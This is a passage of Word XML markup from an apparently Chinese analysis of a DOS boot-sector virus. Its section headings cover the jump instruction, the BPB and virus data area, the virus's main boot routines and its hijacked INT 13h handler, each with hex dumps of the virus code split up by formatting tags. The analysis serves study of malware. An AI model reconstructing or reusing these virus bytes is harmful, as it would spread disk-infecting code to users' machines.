          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、跳转指令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>0000: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">00  EB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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>1C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BPB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>数据及病毒数据区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="850" w:firstLine="1530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 xml:space="preserve">90 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4B</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 49 44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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>4C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>20-20 20 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 02 01 01 00     .KIDL    .....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>0000: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">10  02 E0 00 28 0B F0 09 00-12 00 02 00 00 00 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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、病毒自举主程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2650" w:firstLine="4770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>FA 33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>0000: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7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0"/>
          <w:attr w:name="UnitName" w:val="C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>20  C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0 8E D8 8E D0 BC 00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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-8B F4 FB C4 06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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>4C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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0"/>
          <w:attr w:name="UnitName" w:val="a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>00 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3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>0000: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">30  07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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>8C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 06 09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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A1 13-04 48 48 B1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6"/>
          <w:attr w:name="UnitName" w:val="a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>06 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3 13 04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>0000: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>40  D3 E0 8E C0 B9 00 02 33-FF FC F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a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>3 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4 B8 88 00 06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>0000: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">50  50 CB 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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、盗用中断</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="850" w:firstLine="1530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 xml:space="preserve">1E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0"/>
          <w:attr w:name="UnitName" w:val="F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>50 F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6"/>
          <w:attr w:name="UnitName" w:val="C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>6 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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>2 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0 75-28 D0 EC FE CC 75 22 33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>0000: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7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60"/>
          <w:attr w:name="UnitName" w:val="C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>60  C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0 8E D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8"/>
          <w:attr w:name="UnitName" w:val="a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>8 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>6C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 04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a"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>8A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> C4-2E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Pr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>2A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 06 03 00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 w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>3C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 02 72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>0000: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>70  10 2E 88 26 03 00 3D 02-00 73 03 E8 CC 00 E8 E8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>0000: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C"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80  00 58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F"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00F35590">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>1F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2E FF 2E 07 00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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、病毒自举主程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="1750" w:firstLine="3150"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="33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33 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0 8E C0 CD 13 0E </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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1F</w:t>
        </w:r>
      </w:smartTag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>0000:</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="7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7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">90  80 3E 0B 00 00 74 24 BE-AE 01 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="83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83 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 10 80 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3C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80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 xml:space="preserve">0000:7CA0  </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="75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75 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">8 8B 14 8B </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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4C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 02 BB-00 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="7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7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> B8 01 02 CD 13 72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 xml:space="preserve">0000:7CB0  D7 2E C7 06 48 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="1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01 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0 07-EB 7B 90 B2 80 E</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="8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8 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9 00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 xml:space="preserve">0000:7CC0  BF 18 00 8B </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="45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45 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9 B9 04-00 D3 E8 8B E8 8B 45 FE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>0000:7CD0  D1 E0 40 03 E</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="8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8 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 35 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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8A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-CC FE C1 33 D2 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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8A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> F0 BB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>0000:7CE0  00 05 B8 01 02 CD 13 72-F9 8B C5 BE 34 00 B7 07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>0000:7CF</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="0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0  F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 35 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="33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33 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">9 86 E1 2B F1-F6 75 02 8B D0 86 D5 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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8A</w:t>
        </w:r>
      </w:smartTag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 xml:space="preserve">0000:7D00  05 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2A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> C1 FE C1 B4 02 50-CD 13 58 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="72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72 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8 B1 01 02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>0000:7D</w:t>
      </w:r>
